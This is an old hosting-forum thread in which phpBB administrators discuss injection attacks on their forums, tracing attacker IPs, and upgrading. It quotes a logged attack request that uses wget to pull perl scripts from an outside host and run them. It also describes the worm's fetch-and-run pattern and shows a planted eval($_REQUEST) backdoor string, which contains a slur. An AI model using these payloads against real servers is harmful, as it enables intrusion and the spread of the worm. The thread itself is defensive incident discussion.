phpBB forum attacks

[Chris Locke]

The phpBB team are having minor issues at the moment plugging the security exploits in their software. As forums become more common, they're the next favourite target for hackers and 'meddlers'.

Looking through my weblogs, I've noticed they're growing and one today even used one of the newest exploits.

My query is, I've obviously got the IP address of the person that tried to break into my site. I can email their ISP and let them know one of their users is 'doing naughty things, and can you rap their knuckles please' but does it actually do any good? Do ISPs actually do anything?

If so, my second query, is are there any good sites or tools to trace IP addresses? Eg, 65.75.138.50. Using http://www.arin.net/whois/ only gave me "S. Carrabis NET-MANAGED" ???? Not really much to find an ISP, or confirm who it belongs to.

Apart from keeping the phpBB forums up-to-date (obviously), is there anything I can do to more actively protect my site? I know I can ban IP addresses and ranges, but I'm bound to block either not enough or too much.

How do other people react to 'attacks'?

Example from my log of an attack:

Code:

65.75.138.50 - - [28/Feb/2005:19:56:33 +0000] "GET /forum/viewtopic.php?t=59&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 29465 "-" "LWP::Simple/5.803"

[paulredpath]

Hi,

Im not sure which vuln this is, but many are just infected machines and not actual people. You could try emailing the host, always worth i try.

[Chris Locke]

As usual, cheers for the prompt reply!

Armed with just an IP, which is the best method of tracking down the host? Just a simple DIG or is that the same as a whoIs lookup?
As detailed above, what happens if the information from whoIs is just 'pants'? (or more simply, that I can't read it properly...)

[paulredpath]

Do a whois on www.ripe.net or www.arin.net these will tell you who owns the ips.

[Jacob]

Not very scientific but typing the ip into google with speech marks around it may help you out....

[Chris Locke]

Ok. Thanks.
Will look into it more.

[Waldovia PM]

Can you explain how that example from your log is interpreted as an attack?

[paulredpath]

If you look closely you can see it has *nix commands imbedded in it.

[Chris Locke]

Quote:

Originally Posted by Waldovia PM

Can you explain how that example from your log is interpreted as an attack?

viewtopic.php (used in phpBB forums mainly) has a couple of security exploits where you can 'break it' and run perl scripts - eg, this code:

Code:

cd%  20/var/tmp;wget%20www.panahi.com/frame3.txt;

www.panahi.com isn't my site, so no request to my site should reference it. In fact, that URL points to some code which I haven't a clue what it does - but I suspect it does some naughties to the Banana server if my forum wasn't patched and it got executed.
There are a couple of other entries like that where they run other perl commands - normally printq commands, which I assume are just 'tests'.

[rob]

Actually, you might remember around Christmas we had a large number of suspended sites on banana, that was because of a bug related to this. The general pattern of all of the exploits was something like this (embedded in the insecure viewtopic.php page):


cd /tmp
wget <random URL>/script
perl /tmp/script

That then ran a perl worm that just looked around and exploited as many forums as it could, by googling for something like inurl:viewtopic.php.

The upgraded version is harmless, but it's a pretty fundamental injection idea that really should have been caught. Open Source is great, but sometimes the speed of development means that there's insecure code written, which isn't good.

Maybe we should have security audit days on major projects where all development is stopped and the bugs are security holes are located.

Rob

[liamail]

My customised default template on my install of phpBB has been removed and replaced by a style FI Black, though it has the name

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

when looking at the Styles Administration.

Is this some kind of hack/exploit attempt?

[paulredpath]

Looks like it, what version were you running?

[liamail]

It was version 2.0.11, since posting I have upgraded to 2.0.13.

I deleted the hacked style and re-installed mine. Nothing seems to be amiss now. Do I need to do anything else? Was the hack malicious? Is whatever it does intended to cause harm / damage? Do I need to inform the users of my board?

I did look for the upgrade in CPanel when it was announced by the phpBB team but it wasn't available then, and I subsequently forgot about it.

Would it be possible to have a thread in the Announcements forum (or another if more appropriate) that can be updated / replied to when a new version of phpBB is available to upgrade through CPanel? I would have thought that there must be enough phpBB installs and hence demand among catalyst2 users that people would subscribe to such a thread for instant notification of available upgrades.

[Chris Locke]

Although nice to do it through cPanel, the upgrades available from phpBB are really easy to do. The last couple of updates were simply replacement files, so a quick upload via FTP was all that was needed.

Sometimes quicker to do it when notified, rather than wait for cPanel to be updated...